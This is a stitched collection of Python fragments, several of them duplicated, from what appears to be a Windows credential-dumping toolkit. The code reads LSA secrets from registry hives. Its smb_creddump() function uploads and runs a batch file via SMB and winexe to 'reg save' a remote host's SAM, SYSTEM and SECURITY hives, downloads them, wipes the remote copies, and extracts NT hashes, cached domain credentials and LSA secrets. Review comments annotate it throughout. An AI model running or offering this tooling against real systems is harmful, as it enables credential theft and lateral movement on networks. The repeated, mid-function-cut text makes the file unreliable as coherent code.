print "%s /path/to/System32/SYSTEM /path/to/System32/config/SECURITY false" % sys.argv[ 0]
# NOTE(review): the print above is the tail of a usage-printing function whose
# `def` lies before this excerpt (presumably showUsage(), which is called below);
# it appears at module level here only because the excerpt is cut mid-function.


def dump(src, length=8):
    """Return a classic hex dump of the byte string `src`.

    Each row covers `length` bytes and shows the offset (4 hex digits), the
    bytes as two-digit hex, and the bytes as text with non-printables mapped
    to '.' through the 256-entry translation table FILTER (presumably defined
    earlier in the file; it is not visible in this excerpt). Every row ends
    with a newline, so the returned string ends with one as well; an empty
    `src` yields ''.
    """
    N = 0
    result = ''
    while src:
        # Peel `length` bytes off the front on each pass.
        s, src = src[:length], src[length:]
        hexa = ' '.join(["%02X" % ord(x) for x in s])
        s = s.translate(FILTER)
        # %-*s pads the hex column to length*3 so a short final row still aligns.
        result += "%04X %-*s %s\n" % (N, length * 3, hexa, s)
        N += length
    return result


# Command line: <SYSTEM hive> <SECURITY hive> true|false (the variable name
# below suggests "true" selects the Vista/7 hive format).
if len(sys.argv) < 4 or sys.argv[3] not in ["true", "false"]:
    showUsage()
    sys.exit(1)
else:
    vista = True if sys.argv[3] == "true" else False
# NOTE(review): `vista` is derived from argv[3] but never used -- it is not
# passed to get_file_secrets(), so the true/false argument currently has no
# effect on how the hives are parsed. Confirm get_file_secrets' signature and
# pass it through (or drop the argument from the usage text).
secrets = get_file_secrets(sys.argv[1], sys.argv[2])
if not secrets:
    print "Unable to read LSA secrets. Perhaps you provided invalid hive files?"
    sys.exit(1)
# The decrypted secrets go to stdout in the clear: treat the output (and any
# log it is redirected into) as credential material.
for k in secrets:
    print k
    print dump(secrets[k], length=16)
print "\nExample (Windows Vista/7):"
print "%s /path/to/System32/config/SYSTEM /path/to/System32/config/SECURITY true" % sys.argv[0]
print "\nExample (Windows XP):"
# NOTE(review): the XP example below omits the `config` directory that the
# Vista/7 example uses; this looks like a typo in the usage text (it is a
# runtime string, so it is left untouched here).
print "%s /path/to/System32/SYSTEM /path/to/System32/config/SECURITY false" % sys.argv[0]
# NOTE(review): the prints above are the tail of a usage-printing function
# whose `def` lies before this excerpt (presumably showUsage(), called below);
# they appear at module level here only because the excerpt is cut mid-function.


def dump(src, length=8):
    """Return a classic hex dump of the byte string `src`.

    Each row covers `length` bytes and shows the offset (4 hex digits), the
    bytes as two-digit hex, and the bytes as text with non-printables mapped
    to '.' through the 256-entry translation table FILTER (presumably defined
    earlier in the file; it is not visible in this excerpt). Every row ends
    with a newline, so the returned string ends with one as well; an empty
    `src` yields ''.
    """
    N=0; result=''
    while src:
        # Peel `length` bytes off the front on each pass.
        s,src = src[:length],src[length:]
        hexa = ' '.join(["%02X"%ord(x) for x in s])
        s = s.translate(FILTER)
        # %-*s pads the hex column to length*3 so a short final row still aligns.
        result += "%04X %-*s %s\n" % (N, length*3, hexa, s)
        N+=length
    return result


# Command line: <SYSTEM hive> <SECURITY hive> true|false ("true" = Vista/7
# hives, per the examples printed above).
if len(sys.argv) < 4 or sys.argv[3] not in ["true", "false"]:
    showUsage()
    sys.exit(1)
else:
    vista = True if sys.argv[3] == "true" else False
# NOTE(review): `vista` is derived from argv[3] but never used -- it is not
# passed to get_file_secrets(), so the true/false argument currently has no
# effect on how the hives are parsed. Confirm get_file_secrets' signature and
# pass it through (or drop the argument from the usage text).
secrets = get_file_secrets(sys.argv[1], sys.argv[2])
if not secrets:
    print "Unable to read LSA secrets. Perhaps you provided invalid hive files?"
    sys.exit(1)
# The decrypted secrets go to stdout in the clear: treat the output (and any
# log it is redirected into) as credential material.
for k in secrets:
    print k
    print dump(secrets[k], length=16)
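# 256-entry str.translate() table: byte values whose repr() is three
# characters (printable, no escape needed) map to themselves, the rest to '.'.
_PRINTABLE = ''.join(chr(x) if len(repr(chr(x))) == 3 else '.' for x in range(256))


def _hexdump(data, length=16):
    """Return the byte string *data* as classic hex-dump text.

    One row per *length* bytes: offset (4 hex digits), the bytes as two-digit
    hex in a fixed-width column, then the bytes as text with non-printables
    shown as '.'. Every row ends in a newline, so the result does too; an
    empty *data* yields ''.
    """
    rows = []
    for offset in range(0, len(data), length):
        chunk = data[offset:offset + length]
        hex_part = ' '.join('%02X' % ord(ch) for ch in chunk)
        # %-*s pads the hex column to length*3 so a short final row still aligns.
        rows.append('%04X %-*s %s\n' % (offset, length * 3, hex_part, chunk.translate(_PRINTABLE)))
    return ''.join(rows)


def smb_creddump():
    """
    [-s] <ip> [ user ] [ passwd/nthash ]
    Extract SAM, SECURITY, SYSTEM hives and dump SAM, DCC, LSA Secrets
    """
    # Flow: upload a batch file that `reg save`s the three hives into the
    # target's \windows\temp, run it via winexe, pull the hives back over SMB
    # as <ip>_{sam,system,security}.hive in the current directory, delete the
    # remote copies, then parse the local hives offline with creddump.
    # Everything this produces -- the hive files and the console output -- is
    # credential material (NT hashes, cached domain creds, LSA secrets).
    # Relies on module-level helpers BASEDIR, CONF, text, set_creds, smbclient
    # and winexe, whose definitions are not visible in this file excerpt.
    import tempfile

    try:
        sys.path.insert(0, BASEDIR + '/creddump')
        from framework.win32 import hashdump, domcachedump, lsasecrets
    except ImportError:
        # text(..., 1) appears to abort (the original relied on it: the code
        # below needs these modules); the explicit return makes sure of it.
        text("[!] Error: Creddump dependency missing.", 1)
        return

    set_creds(3)

    target = CONF['smb_ip']
    # The target string is spliced into smbclient command lines and into
    # local file names below, so only accept a plain host name / IP literal
    # (IPv6 colons allowed) rather than arbitrary text.
    if not target or not all(ch.isalnum() or ch in '._-:' for ch in target):
        text("[!] Error: refusing target %r, not a plain host/IP." % (target,))
        return

    hives = ('sam', 'system', 'security')
    remote_dir = '\\windows\\temp'
    bat = '\r\n'.join([
        '@echo off',
        'cd ' + remote_dir,
        'reg save HKLM\\SAM sam.hive /y',
        'reg save HKLM\\SYSTEM system.hive /y',
        'reg save HKLM\\SECURITY security.hive /y',
    ])

    text("[*] Extracting hives...")
    # mkstemp creates the file O_EXCL, mode 0600, under an unpredictable name.
    # The previous fixed /tmp/cred_run.bat could be pre-created or symlinked
    # by another local user (insecure temp file), letting them clobber a file
    # or swap the script between our write and its upload/execution as
    # SYSTEM on the target.
    fd, tmpfile = tempfile.mkstemp(prefix='cred_run.', suffix='.bat')
    try:
        with os.fdopen(fd, 'w') as handle:
            handle.write(bat)
        try:
            smbclient('put "%s" "%s\\cred_run.bat"' % (tmpfile, remote_dir))
            print(winexe(remote_dir + '\\cred_run.bat'))
            text("[*] Downloading hives...")
            for hive in hives:
                local = '%s_%s.hive' % (target, hive)
                smbclient('get "%s\\%s.hive" "%s"' % (remote_dir, hive, local))
                # The hive holds password hashes / secrets: owner-only access.
                if os.path.exists(local):
                    os.chmod(local, 0o600)
        finally:
            # Even if the transfer failed part-way, do not leave hive copies
            # lying in the target's temp directory (best effort; smbclient's
            # failure behaviour is not visible here).
            text("[*] Removing temp files...")
            smbclient('del "%s\\cred_run.bat"' % remote_dir)
            for hive in hives:
                smbclient('del "%s\\%s.hive"' % (remote_dir, hive))
    finally:
        os.unlink(tmpfile)

    system_hive = target + '_system.hive'
    security_hive = target + '_security.hive'
    text("[*] Extracting SAM credentials...")
    hashdump.dump_file_hashes(system_hive, target + '_sam.hive')
    text("[*] Extracting MSCASH credentials...")
    domcachedump.dump_file_hashes(system_hive, security_hive)

    text("[*] Extracting LSA Secrets...")
    try:
        secrets = lsasecrets.get_file_secrets(system_hive, security_hive)
        if not secrets:
            text("[!] Unable to read LSA secrets.")
        else:
            for name in secrets:
                print(name)
                print(_hexdump(secrets[name]))
    except Exception as err:
        # Still best effort (the hives are already saved locally), but say
        # why instead of the old silent `except: pass`.
        text("[!] Error: LSA secret extraction failed: %s" % err)
    text("[*] SYSTEM, SAM and SECURITY hives were saved in the current directory.")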
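import binascii

from framework.win32.lsasecrets import get_file_secrets

# Hex dump code from
# http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/142812
# 256-entry str.translate() table: byte values whose repr() is three
# characters (printable, no escape needed) map to themselves, the rest to '.'.
FILTER = ''.join(chr(x) if len(repr(chr(x))) == 3 else '.' for x in range(256))


def dump(src, length=8):
    """Return a classic hex dump of the byte string *src*.

    Each row covers *length* bytes and shows the offset (4 hex digits), the
    bytes as two-digit hex in a fixed-width column, and the bytes as text
    with non-printables replaced by '.' (via FILTER). Every row ends with a
    newline, so the result ends with one too; an empty *src* yields ''.
    """
    rows = []
    for offset in range(0, len(src), length):
        chunk = src[offset:offset + length]
        hex_part = ' '.join('%02X' % ord(ch) for ch in chunk)
        # %-*s pads the hex column to length*3 so a short final row still aligns.
        rows.append('%04X %-*s %s\n' % (offset, length * 3, hex_part, chunk.translate(FILTER)))
    return ''.join(rows)


def _usage_exit():
    """Print the command-line synopsis and exit with status 1."""
    print("usage: %s Bootkey <security hive>" % sys.argv[0])
    sys.exit(1)


if len(sys.argv) < 3:
    _usage_exit()
# The bootkey is given as a hex string. Reject a malformed one with the usage
# text instead of an uncaught decoding traceback; unhexlify is the same
# conversion as str.decode("hex") (Python 2 raises TypeError on bad input,
# Python 3 binascii.Error, a ValueError).
try:
    bootkey = binascii.unhexlify(sys.argv[1])
except (TypeError, ValueError):
    print("Bootkey must be an even-length hex string, got %r" % sys.argv[1])
    _usage_exit()
secrets = get_file_secrets(bootkey, sys.argv[2])
if not secrets:
    print("Unable to read LSA secrets. Perhaps you provided invalid hive files?")
    sys.exit(1)
# The decrypted secrets are written to stdout in the clear: treat the output
# (and any log it is redirected into) as credential material.
for name in secrets:
    print(name)
    print(dump(secrets[name], length=16))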
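import binascii

# Hex dump code from
# http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/142812
# 256-entry str.translate() table: byte values whose repr() is three
# characters (printable, no escape needed) map to themselves, the rest to '.'.
FILTER = ''.join(chr(x) if len(repr(chr(x))) == 3 else '.' for x in range(256))


def dump(src, length=8):
    """Return a classic hex dump of the byte string *src*.

    Each row covers *length* bytes and shows the offset (4 hex digits), the
    bytes as two-digit hex in a fixed-width column, and the bytes as text
    with non-printables replaced by '.' (via FILTER). Every row ends with a
    newline, so the result ends with one too; an empty *src* yields ''.
    """
    rows = []
    for offset in range(0, len(src), length):
        chunk = src[offset:offset + length]
        hex_part = ' '.join('%02X' % ord(ch) for ch in chunk)
        # %-*s pads the hex column to length*3 so a short final row still aligns.
        rows.append('%04X %-*s %s\n' % (offset, length * 3, hex_part, chunk.translate(FILTER)))
    return ''.join(rows)


def _usage_exit():
    """Print the command-line synopsis and exit with status 1."""
    print("usage: %s Bootkey <security hive>" % sys.argv[0])
    sys.exit(1)


if len(sys.argv) < 3:
    _usage_exit()
# The bootkey is given as a hex string. Reject a malformed one with the usage
# text instead of an uncaught decoding traceback; unhexlify is the same
# conversion as str.decode("hex") (Python 2 raises TypeError on bad input,
# Python 3 binascii.Error, a ValueError).
try:
    bootkey = binascii.unhexlify(sys.argv[1])
except (TypeError, ValueError):
    print("Bootkey must be an even-length hex string, got %r" % sys.argv[1])
    _usage_exit()
secrets = get_file_secrets(bootkey, sys.argv[2])
if not secrets:
    print("Unable to read LSA secrets. Perhaps you provided invalid hive files?")
    sys.exit(1)
# The decrypted secrets are written to stdout in the clear: treat the output
# (and any log it is redirected into) as credential material.
for name in secrets:
    print(name)
    print(dump(secrets[name], length=16))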
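# 256-entry str.translate() table: byte values whose repr() is three
# characters (printable, no escape needed) map to themselves, the rest to '.'.
_PRINTABLE = ''.join(chr(x) if len(repr(chr(x))) == 3 else '.' for x in range(256))


def _hexdump(data, length=16):
    """Return the byte string *data* as classic hex-dump text.

    One row per *length* bytes: offset (4 hex digits), the bytes as two-digit
    hex in a fixed-width column, then the bytes as text with non-printables
    shown as '.'. Every row ends in a newline, so the result does too; an
    empty *data* yields ''.
    """
    rows = []
    for offset in range(0, len(data), length):
        chunk = data[offset:offset + length]
        hex_part = ' '.join('%02X' % ord(ch) for ch in chunk)
        # %-*s pads the hex column to length*3 so a short final row still aligns.
        rows.append('%04X %-*s %s\n' % (offset, length * 3, hex_part, chunk.translate(_PRINTABLE)))
    return ''.join(rows)


def smb_creddump():
    """
    [-s] <ip/file/range> [ user ] [ passwd/nthash ]
    Extract SAM, SECURITY, SYSTEM hives and dump SAM, DCC, LSA Secrets
    """
    # Flow: upload a batch file that `reg save`s the three hives into the
    # target's \windows\temp, run it via winexe, pull the hives back over SMB
    # as <ip>_{sam,system,security}.hive in the current directory, delete the
    # remote copies, then parse the local hives offline with creddump.
    # Everything this produces -- the hive files and the console output -- is
    # credential material (NT hashes, cached domain creds, LSA secrets).
    # Relies on module-level helpers BASEDIR, CONF, text, set_creds, smbclient
    # and winexe, whose definitions are not visible in this file excerpt.
    import tempfile

    try:
        sys.path.insert(0, BASEDIR + '/creddump')
        from framework.win32 import hashdump, domcachedump, lsasecrets
    except ImportError:
        # text(..., 1) appears to abort (the original relied on it: the code
        # below needs these modules); the explicit return makes sure of it.
        text("[!] Error: Creddump dependency missing.", 1)
        return

    set_creds(3)

    target = CONF["smb_ip"]
    # The target may come from a file or range and is spliced into smbclient
    # command lines and local file names below, so only accept a plain host
    # name / IP literal (IPv6 colons allowed). Return rather than abort so one
    # bad entry does not stop a batch run.
    if not target or not all(ch.isalnum() or ch in '._-:' for ch in target):
        text("[!] %s Error(smb_creddump): refusing target, not a plain host/IP." % (target,))
        return

    hives = ('sam', 'system', 'security')
    remote_dir = '\\windows\\temp'
    bat = '\r\n'.join([
        '@echo off',
        'cd ' + remote_dir,
        'reg save HKLM\\SAM sam.hive /y',
        'reg save HKLM\\SYSTEM system.hive /y',
        'reg save HKLM\\SECURITY security.hive /y',
    ])

    text("[*] %s Extracting hives..." % (target))
    # mkstemp creates the file O_EXCL, mode 0600, under an unpredictable name.
    # The previous predictable /tmp/cred_run.<ip>.bat could be pre-created or
    # symlinked by another local user (insecure temp file), letting them
    # clobber a file or swap the script between our write and its
    # upload/execution as SYSTEM on the target.
    fd, tmpfile = tempfile.mkstemp(prefix='cred_run.%s.' % target, suffix='.bat')
    try:
        with os.fdopen(fd, 'w') as handle:
            handle.write(bat)
        try:
            smbclient('put "%s" "%s\\cred_run.bat"' % (tmpfile, remote_dir))
            text("[*] %s Running cred_run.bat\n%s\n" % (target, winexe(remote_dir + '\\cred_run.bat')))
            text("[*] %s Downloading hives..." % (target))
            for hive in hives:
                local = '%s_%s.hive' % (target, hive)
                smbclient('get "%s\\%s.hive" "%s"' % (remote_dir, hive, local))
                # The hive holds password hashes / secrets: owner-only access.
                if os.path.exists(local):
                    os.chmod(local, 0o600)
        finally:
            # Even if the transfer failed part-way, do not leave hive copies
            # lying in the target's temp directory (best effort; smbclient's
            # failure behaviour is not visible here).
            text("[*] %s Removing temp files..." % (target))
            smbclient('del "%s\\cred_run.bat"' % remote_dir)
            for hive in hives:
                smbclient('del "%s\\%s.hive"' % (remote_dir, hive))
    finally:
        os.unlink(tmpfile)

    system_hive = target + '_system.hive'
    security_hive = target + '_security.hive'
    text("[*] %s Extracting SAM credentials..." % (target))
    hashes = hashdump.dump_file_hashes(system_hive, target + '_sam.hive')
    text("[*] %s Extracting MSCASH credentials..." % (target))
    mscash = domcachedump.dump_file_hashes(system_hive, security_hive)
    text("[*] %s SAM hashes\n%s" % (target, "\n".join(hashes)))
    text("[*] %s MsCash\n%s" % (target, "\n".join(mscash)))

    text("[*] %s Extracting LSA Secrets..." % (target))
    try:
        secrets = lsasecrets.get_file_secrets(system_hive, security_hive)
        if not secrets:
            text("[!] %s Error(smb_creddump): Unable to read LSA secrets." % (target))
        else:
            # Collect the report in its own list. The original rebound
            # `secrets` to [] right here, so the loop over it never ran and no
            # LSA secret was ever printed.
            report = []
            for name in secrets:
                report.append(name)
                report.append(_hexdump(secrets[name]))
            text("[*] %s LSA Secrets\n%s" % (target, "\n".join(report)))
    except Exception as err:
        # Still best effort (the hives are already saved locally), but say
        # why instead of the old silent `except: pass`.
        text("[!] %s Error(smb_creddump): LSA secret extraction failed: %s" % (target, err))
    text(
        "[*] %s SYSTEM, SAM and SECURITY hives were saved in the current directory." % (target))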